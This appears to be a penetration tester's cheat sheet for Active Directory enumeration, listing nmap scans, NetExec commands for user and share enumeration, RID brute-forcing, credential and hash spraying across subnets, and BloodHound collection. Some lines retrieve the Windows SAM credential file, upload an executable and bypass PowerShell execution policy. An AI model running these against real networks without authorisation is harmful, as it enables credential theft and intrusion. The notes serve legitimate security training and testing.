Tips

• Indicators of DC
  • DNS, LDAP, Kerberos
• Utilize https://wadcoms.github.io/ for Enumeration

Tools

<aside>

• Nmap
• NetExec
• Bloodhound
• Impacket - wmiexec, psexec
• evili-winrm </aside>

Enumeration

Host Discovery

Port Scanning

Nmap

nmap $IP -Pn -n --open --min-rate 3000 -p-
nmap $IP -sC -sV -p [ports]
nmap $IP -sU --top-ports 10

• [ ] Check all of the Network Protocols from the Nmap Scan. Especially the following if present:
  • SMB, LDAP, RPC, Kerberos, DNS
    • smbclient, rpcclient, kerbrute, ldapsearch etc.

NetExec

nxc smb $IP -u [user] -p [password]
nxc smb $IP -u [user] -p [password] --users
nxc smb $IP -u [user] -p [password] --groups
nxc smb $IP -u [user] -p [password] --shares
nxc smb $IP -u [user] -p [password] --rid-brute
nxc smb $IP -u [user] -p [password] --rid-brute | grep SidTypeUser
nxc smb $IP -u [user] -p [password] --continue-on-success
nxc smb $IP -u [user] -p [password] --local-auth

# Local Admin Spraying
nxc smb 172.16.5.0/24 -u [user] -p [password] --local-auth
nxc smb 172.16.5.0/24 -u [user] -H [hash] --local-auth

# logged-on-users
nxc smb 10.10.110.0/24 -u [user] -p [password] --logged-on-users

# Upload and dowonload
nxc mssql $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc mssql $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'
nxc smb $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc smb $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'

Kerbrute

Kerberos 88

Bloodhound

Collectors

# Linux
bloodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c All --zip
bllodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c DCOnly --zip

# Windows - SharpHound.exe
SharpHound.exe --CollectionMethods All --Domain [domain] --ExcludeDCs

# Windows - SharpHound.ps1
powershell -ep bypass
. .\\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain [domain] -ZipFileName [name]

Password Policy